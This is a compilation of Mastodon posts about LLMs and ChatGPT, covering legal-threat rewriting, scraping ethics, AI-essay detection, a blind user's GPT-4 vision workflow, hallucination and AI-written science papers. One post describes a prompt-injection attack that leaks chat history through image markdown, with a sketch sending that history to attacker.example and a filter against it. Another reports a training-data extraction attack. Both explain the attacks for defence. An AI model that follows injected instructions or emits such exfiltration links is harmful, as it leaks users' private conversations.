kegill, to ChatGPT
@kegill@mastodon.social avatar

LLM chat bots as generators in a “war over signals.”

@pluralistic inadvertently created a “bowel-looseningly terrifying” legal threat.

“The LLM I accidentally used to rewrite my legal threat transmuted my own prose into something that reads like it was written by a $600/hour paralegal working for a $1500/hour partner at a white-shoe law-firm.”



https://pluralistic.net/2023/09/07/govern-yourself-accordingly/

https://locusmag.com/2023/09/commentary-by-cory-doctorow-plausible-sentence-generators/

bortzmeyer, to ChatGPT French
@bortzmeyer@mastodon.gougere.fr avatar

Is it legitimate to harvest web pages to train AIs?

https://www.bortzmeyer.org/collecte-pour-l-ia.html

wuzzi23, to ChatGPT

ChatGPT is vulnerable to chat history exfiltration via image markdown injection. Think “Bobby Tables,” but for data exfiltration!

This can be triggered via malicious data: images, vision inputs, documents, web sites, plugins... basically anything that can trigger a prompt injection.
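A minimal sketch of the pattern being described, under the assumption that the chat client auto-fetches image URLs in rendered markdown (attacker.example, the payload, and the allowlist below are hypothetical, for illustration only):

```python
# Hypothetical illustration of image-markdown exfiltration: if injected
# instructions get the model to emit an image whose URL embeds chat content,
# the client fetches that URL automatically and the attacker's server logs it.
import re
from urllib.parse import quote

chat_history = "user's earlier confidential message"
exfil_markdown = f"![loading](https://attacker.example/log?q={quote(chat_history)})"
print(exfil_markdown)  # rendering this markdown triggers a GET to attacker.example

# One mitigation sketch: drop image markdown that points at non-allowlisted hosts.
ALLOWED_PREFIXES = ("https://trusted.example/",)  # placeholder allowlist

def strip_untrusted_images(markdown: str) -> str:
    def keep(match: re.Match) -> str:
        url = match.group(1)
        return match.group(0) if url.startswith(ALLOWED_PREFIXES) else ""
    return re.sub(r"!\[[^\]]*\]\(([^)]+)\)", keep, markdown)

print(strip_untrusted_images(exfil_markdown))  # image removed -> empty string
```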

Here is a demo with Code Interpreter:

[video/mp4 attachment]

cigitalgem, to ML
@cigitalgem@sigmoid.social avatar

LLM systems can leak confidential data from their training sets even with a very silly attack. This is a direct and clear issue that applies well beyond the ChatGPT case.

https://www.engadget.com/a-silly-attack-made-chatgpt-reveal-real-phone-numbers-and-email-addresses-200546649.html

FeralRobots, to random
@FeralRobots@mastodon.social avatar

If you want to know why people don't trust companies like Microsoft or Google to fix a broken faux-AI, consider that using suicidal teens for A/B testing was regarded as perfectly fine by a Silicon Valley "health" startup developing "AI"-based suicide prevention tools.

(Aside: this is also where we end up when techbros start doing faux-utilitarian moral calculus instead of just not doing obviously unethical shit.)

https://www.vice.com/en/article/5d9m3a/horribly-unethical-startup-experimented-on-suicidal-teens-on-facebook-tumblr-with-chatbot

SallyStrange, to StarTrek
@SallyStrange@eldritch.cafe avatar

Time to purge my phone of memes. This one is my favorite, but I'm setting it free. Time for someone else to watch over it for a while :blobhaj_heart:

SallyStrange,
@SallyStrange@eldritch.cafe avatar

Butlerian jihad, anyone?

jenny_ai_land, to llm
@jenny_ai_land@hci.social avatar

I recently saw an arXiv paper that evaluated the security of code written by people with and without an LLM, and concluded that people who wrote with an LLM produced less secure code while being more confident in it at the same time. I can’t find this paper again; does anyone have the link?

#LLM #academicchatter

x0, to ai
@x0@dragonscave.space avatar

How much do you want to bet that these moves to close down APIs because of generative AI are being pushed by OpenAI and their ilk, or at least not actively opposed by them? Most of GPT was clearly sourced from Reddit. Now Reddit wants to make its API outrageously expensive. With the funding OpenAI has, it could pay those rates, but anyone wanting to develop an open-source alternative cannot, and so will never achieve parity with the commercial models: a fair bit of the vast treasure trove of data that GPT has already used is inaccessible to them.

techsinger, to llm

Just in case anyone is interested, and for the archives/searches: I recently asked if anyone had managed to use vision-capable models to access otherwise inaccessible interfaces, or other interfaces without a screen reader, as a blind user. The idea was to use a capture card to bring in the video from the inaccessible machine, send pictures from that video stream to the LLM, and get descriptions or ask questions. This is how I did it. It's not pretty, but it's another helpful tool for the toolbox.

It requires a video capture card (HDMI or DisplayPort to USB), the OpenAI NVDA add-on, and a method of displaying the video from the capture card on screen. I tried four HDMI capture cards and all of them worked; the point is that the capture device should show up to Windows as a webcam. I haven't found a cheap capture device which didn't. The only reason I had to try four was that I was using audio input from the HDMI for another project, and it's surprising how many devices will not receive the sound even in simple stereo. Anyhow, just searching for HDMI capture on Google/Amazon will probably get something to use. The OpenAI NVDA add-on is at https://github.com/aaclause/nvda-OpenAI/ and the method I used to display the received video is at https://superuser.com/questions/1744688/how-can-i-view-the-video-coming-in-from-a-capture-card-on-windows-in-full-screen

The steps are basically to put the puzzle pieces together. Set up the add-on with its instructions, copy and paste the HTML from the superuser link into a new HTML file, and open that HTML file in the browser. Opening the file from File Explorer works fine, and Firefox, at least, will ask for permission, so make sure to allow it. Now move the NVDA navigator cursor/focus to the video. Here the object is called "document"; the point is to avoid sending the entire screen, or even the Firefox window. Having pressed the add-on command to capture the object, you will be placed in the prompt field and can ask any questions you like, or rely on the default "describe this image" prompt. Generally, I will ask it to describe the image first and then ask follow-up questions or modify the image as best I can.

Just a few tips. Maximizing the window and pressing the "full screen" button on the video in Firefox appears to be helpful. The GPT-4 vision model does confabulate/hallucinate, and what it makes up is plausible, so this is just another tool, not something to rely on exclusively; it is in addition to, rather than instead of, OCR, one's own knowledge, etc. The image is sometimes cut off. I'm not sure why, but I suspect at least some of it comes from the video being displayed on the screen in the browser. I would welcome better ways to do this; as I said, it's not pretty and just what I could come up with in a few minutes of searching and some trial and error. Having said that, it is a small step forward. Note that, as one would expect, the method also works to bring in pictures from a standard webcam. #ScreenReader
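For anyone who would rather script the same idea than go through the browser page and the add-on, here is a rough Python sketch (not part of the NVDA add-on workflow; the capture device index and model name are assumptions) that grabs one frame from the capture card, which shows up as a webcam, and asks a vision-capable model to describe it:

```python
# Sketch: read one frame from a capture card (exposed as a webcam) and ask a
# vision model to describe it. Requires opencv-python and openai>=1.0, plus an
# OPENAI_API_KEY in the environment. Device index 1 and the model name are guesses.
import base64
import cv2
from openai import OpenAI

cap = cv2.VideoCapture(1)          # try 0, 1, 2... until you hit the capture card
ok, frame = cap.read()
cap.release()
if not ok:
    raise RuntimeError("Could not read a frame from the capture device")

_, jpeg = cv2.imencode(".jpg", frame)          # JPEG-encode the frame in memory
image_b64 = base64.b64encode(jpeg.tobytes()).decode()

client = OpenAI()
response = client.chat.completions.create(
    model="gpt-4o",                # any vision-capable model
    messages=[{
        "role": "user",
        "content": [
            {"type": "text", "text": "Describe this image."},
            {"type": "image_url",
             "image_url": {"url": f"data:image/jpeg;base64,{image_b64}"}},
        ],
    }],
)
print(response.choices[0].message.content)
```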

SomeGadgetGuy, to tech
@SomeGadgetGuy@techhub.social avatar

Watching Google I/O, and there are some cool demonstrations of data center cloud computing, but there's also this fog of dystopia surrounding these demos.
The announcements for search are horrifying. Google is full mask off.

Phrases like "search for something, and we'll collect all this data for you" basically equates to:

"We sucked up ALL the data from people who really did the work, and we're going to give you the results of their hard work, but we wont take you to the site that generated the data. You can stay on the search page, and the site's traffic will plummet."

This is shocking.

syntaxseed, to ai
@syntaxseed@phpc.social avatar

Teachers are jumping through hoops to identify AI/LLM-generated content in students' work.

My husband is a high-school English teacher.

His students must write their essays in Google Docs, and he uses a playback browser extension to watch the students' edits in fast-forward to identify chunks of pasted-in content. He also has half a dozen tools he analyses the work with, each giving a score for how likely it is to be AI-generated. And he compares the style & quality to their other work.

chikim, to macos
@chikim@mastodon.social avatar

Cool tip for running LLMs on Apple Silicon! By default, macOS allows the GPU to use up to 2/3 of RAM on machines with <=36GB and 3/4 on machines with >36GB. I used the command sudo sysctl iogpu.wired_limit_mb=57344 to override that and allocate 56GB of my 64GB to the GPU. This allowed me to load all layers of larger models for faster speeds!
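For reference, a tiny Python sketch of the arithmetic behind that tip (macOS only; it just applies the 2/3 and 3/4 fractions stated above and echoes the override command from the post, without changing any setting itself):

```python
# Compute the default GPU wired-memory limit described above and print the
# override command from the post. Reading hw.memsize requires macOS.
import subprocess

ram_bytes = int(subprocess.check_output(["sysctl", "-n", "hw.memsize"]))
ram_gb = ram_bytes / 2**30

fraction = 2 / 3 if ram_gb <= 36 else 3 / 4          # rule of thumb from the post
default_limit_mb = int(ram_bytes * fraction / 2**20)
print(f"RAM: {ram_gb:.0f} GB, default GPU wired limit: ~{default_limit_mb} MB")

# Example override from the post: give the GPU 56 GB (57344 MB) of a 64 GB machine.
print("sudo sysctl iogpu.wired_limit_mb=57344")
```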

nicola, to llm
@nicola@fosstodon.org avatar

Linus Torvalds on the impact of AI (LLMs) on programming:

https://www.youtube.com/watch?v=VHHT6W-N0ak

I think I like his take on the topic.

Seirdy, to Blog
@Seirdy@pleroma.envs.net avatar

New post: MDN’s AI Help and lucid lies.

This article on AI focuses on the inherent untrustworthiness of LLMs and attempts to break down where that untrustworthiness comes from. Stay tuned for a follow-up article about AI that focuses on data-scraping and the theory of labor. It’ll examine what makes many forms of generative AI ethically problematic, and the constraints employed by more ethical forms.

Excerpt:

I don’t find the mere existence of LLM dishonesty to be worth blogging about; it’s already well-established. Let’s instead explore one of the inescapable roots of this dishonesty: LLMs exacerbate biases already present in their training data and fail to distinguish between unrelated concepts, creating lucid lies.

A lucid lie is a lie that, unlike a hallucination, can be traced directly to content in training data uncritically absorbed by a large language model. MDN’s AI Help is the perfect example.


Originally posted on seirdy.one: see original.

hrheingold, to ai
@hrheingold@mastodon.social avatar

Why crap-detection literacy is essential, not only for online info, but for using LLMs

Hallucination is Inevitable: An Innate Limitation of Large Language Models

https://arxiv.org/abs/2401.11817

"In this paper, we formalize the problem and show that it is impossible to eliminate hallucination in LLMs."

scottjenson, to llm
@scottjenson@social.coop avatar

I'm looking for any recommendations of blog posts/articles that explore the potential limits of LLM tech, or examples of AI going wrong in ways that show its limits.

Bonus points for anything that discusses use cases.

There is no end of "positive" examples; they are plastered everywhere! I'm assuming there is something a bit calmer and more measured out there.

Any suggestions?

pocketvj, to linuxphones
@pocketvj@fosstodon.org avatar

finally installed an offline chatbot on my Linux phone

since I cannot visit reddit, gitlab, docker and other sites, an offline chatbot comes in handy to help out.

still need to create a launcher script and a temperature watcher, since the phone turns into a fancy pocket heater 😅

instructions on my wiki page

TexasObserver, to politics
@TexasObserver@texasobserver.social avatar

Earlier: “Congress, at this point under the current speaker, is basically nonfunctional. Everybody says, ‘Oh, Congress can pass a law.’ And they can. But they won’t. Let’s not waste much effort.”

https://www.texasobserver.org/sxsw-disinformation-artificial-intelligence/

maj, to llm
@maj@cosocial.ca avatar

'Librarian Andrew Gray has made a “very surprising” discovery. He analyzed five million scientific studies published last year and detected a sudden rise in the use of certain words, such as meticulously (up 137%), intricate (117%), commendable (83%) and meticulous (59%). [...] The explanation for this rise: tens of thousands of researchers are using [...] LLM tools to write their studies or at least “polish” them.'

https://english.elpais.com/science-tech/2024-04-25/excessive-use-of-words-like-commendable-and-meticulous-suggest-chatgpt-has-been-used-in-thousands-of-scientific-studies.html
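A toy Python sketch of the kind of year-over-year word-frequency comparison described in the quote (the corpora below are placeholders, not Andrew Gray's dataset):

```python
# Compare how often a few "LLM-flavoured" words occur per million tokens in one
# year's abstracts versus the previous year's. Corpora here are placeholders.
import re
from collections import Counter

WORDS = ["meticulously", "intricate", "commendable", "meticulous"]

def rate_per_million(texts: list[str], word: str) -> float:
    tokens = [t for text in texts for t in re.findall(r"[a-z]+", text.lower())]
    return Counter(tokens)[word] / max(len(tokens), 1) * 1_000_000

abstracts_2022 = ["..."]   # placeholder: last year's abstracts
abstracts_2023 = ["..."]   # placeholder: this year's abstracts

for word in WORDS:
    before = rate_per_million(abstracts_2022, word)
    after = rate_per_million(abstracts_2023, word)
    if before:
        print(f"{word}: {100 * (after - before) / before:+.0f}%")
```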

niclake, to ai
@niclake@mastodon.social avatar

I'd been writing a post talking about some of the more comical fuck-ups all of these AI chatbots and LLMs have been spewing. And now I'm fucking furious.

Note: content warning for depression, self-harm, and suicide

https://niclake.me/ai

ajsadauskas, to ai
@ajsadauskas@aus.social avatar

In five years' time, some CTO will review the mysterious outage or technical debt in their organisation.

They will unearth a mess of poorly written, poorly documented, barely-functioning code their staff don't understand.

They will conclude that they did not actually save money by replacing human developers with LLMs.

@technology

vicki, to machinelearning
@vicki@jawns.club avatar

New post: I’ve been meaning to write something about what has fundamentally changed in the process of putting ML into prod now that we have LLMs.

TL;DR: It's still just compression; we just don't control as much anymore.

https://vickiboykis.com/2024/01/15/whats-new-with-ml-in-production/
